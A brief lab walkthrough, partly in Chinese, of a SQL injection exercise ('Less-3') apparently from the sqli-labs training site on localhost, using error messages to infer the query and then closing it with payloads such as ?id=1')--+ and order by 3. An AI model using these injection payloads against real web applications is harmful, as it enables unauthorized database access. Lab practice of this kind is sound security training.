Less-3 GET - Error based -Single quotes with twist- String
1.原页面
2.?id=1
3.?id=1’
‘ ‘1’’) LIMIT 0,1 ‘ --> ‘1’’) LIMIT 0,1 --> ‘1’) LIMIT 0,1 -->
(‘1’) LIMIT 0,1
SQL:
Select login_name,password from admin where id =(‘id’) limit 0,1
4.闭合单引号
http://127.0.0.1/sqli/Less-3/?id=1’)–+
SQL:
Select login_name,password from admin where id=(‘1’)–+’)limit 0,1;
5.查询字段
?id=1’) order by 3–+